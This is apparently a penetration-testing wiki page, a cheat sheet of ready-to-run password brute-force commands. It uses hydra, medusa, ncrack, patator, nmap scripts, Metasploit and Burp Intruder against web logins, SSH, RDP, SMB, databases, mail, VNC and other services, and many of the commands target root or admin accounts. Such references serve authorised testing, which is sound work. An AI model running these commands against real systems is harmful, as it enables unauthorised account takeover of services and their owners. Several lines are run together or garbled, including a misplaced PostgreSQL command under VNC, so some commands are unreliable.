Brute-force service password

Web

hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin

Logins

Use Burp suite.

Intecept a login attempt.
Right-lick "Send to intruder". Select Sniper if you have nly one field you want to bruteforce. If you for example already know the username. Otherwise select cluster-attack.
Select your payload, your wordlist.
Click attack.
Look for response-length that differs from the rest.

HTTP Basic Auth

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10

HTTP - Post Form

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com

hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin

SSH

hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt ssh://$ip

hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh

hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh

hydra -l root -P wordlist.txt $ip ssh

hydra -L userlist.txt -P best1050.txt $ip -s 22 ssh -V

hydra -l root -P passwords.txt [-t 32] <IP> ssh

ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]

medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh

SNMP

hydra -P wordlist.txt -v $ip snmp

nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]

onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>

hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

Remote Desktop Protocol

ncrack -vv --user admin -P password-file.txt rdp://$ip

ncrack -vv --user <User> -P pwds.txt rdp://<IP>

hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip

AFP

nmap -p 548 --script afp-brute <IP>

AJP

nmap --script ajp-brute -p 8009 <IP>

Cassandra Apache

nmap --script cassandra-brute -p 9160 <IP>

CouchDB

msf> use auxiliary/scanner/couchdb/couchdb_login

FTP

hydra -l root -P passwords.txt [-t 32] <IP> ftpncrack -p 21 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp

IMAP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -Vhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -Vnmap -sV --script imap-brute -p <PORT> <IP>

IRC

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

LDAP

nmap --script ldap-brute -p 389 <IP>

hydra -L users.txt -P passwords.txt $ip ldap2 -V -f

Mongo

nmap -sV --script mongodb-brute -n -p 27017 <IP>

MySQL

hydra -L usernames.txt -P pass.txt <IP> mysql

OracleSQL

pip3 install cx_Oracle --upgradepatator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30john hashes.txt

POP3

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V

hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

PostgreSQL

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres

medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres

ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432

patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

PPTP

cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>

Redis

nmap --script redis-brute -p 6379 <IP>hydra –P /path/pass.txt <IP> redis

Rexec

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

hydra -l root -P passwords.txt <IP> rtsp

SMB

nmap --script smb-brute -p 445 <IP>

hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1

Telnet

hydra -l root -P passwords.txt [-t 32] <IP> telnetncrack -p 23 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

VNC

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vncmedusa -h <IP> –u root -P /root/Desktop/pass.txt –M vncncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T

patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_login

nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

SMTP

hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

PreviousPost Requests NextCracking Password

Last updated 4 years ago

hashtagWeb

hashtagLogins

hashtagHTTP Basic Auth

hashtagHTTP - Post Form

hashtagHTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

hashtagHydra attack http get 401 login with a dictionary

hashtagSSH

hashtagSNMP

hashtagRemote Desktop Protocol

hashtagAFP

hashtagAJP

hashtagCassandra Apache

hashtagCouchDB

hashtagFTP

hashtagIMAP

hashtagIRC

hashtagISCSI

hashtagLDAP

hashtagMongo

hashtagMySQL

hashtagOracleSQL

hashtagPOP3

hashtagPostgreSQL

hashtagPPTP

hashtagRedis

hashtagRexec

hashtagRlogin

hashtagRsh

hashtagRsync

hashtagRTSP

hashtagSMB

hashtagTelnet

hashtagVNC

hashtagSMTP

Web

Logins

HTTP Basic Auth

HTTP - Post Form

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

Hydra attack http get 401 login with a dictionary

SSH

SNMP

Remote Desktop Protocol

AFP

AJP

Cassandra Apache

CouchDB

FTP

IMAP

IRC

ISCSI

LDAP

Mongo

MySQL

OracleSQL

POP3

PostgreSQL

PPTP

Redis

Rexec

Rlogin

Rsh

Rsync

RTSP

SMB

Telnet

VNC

SMTP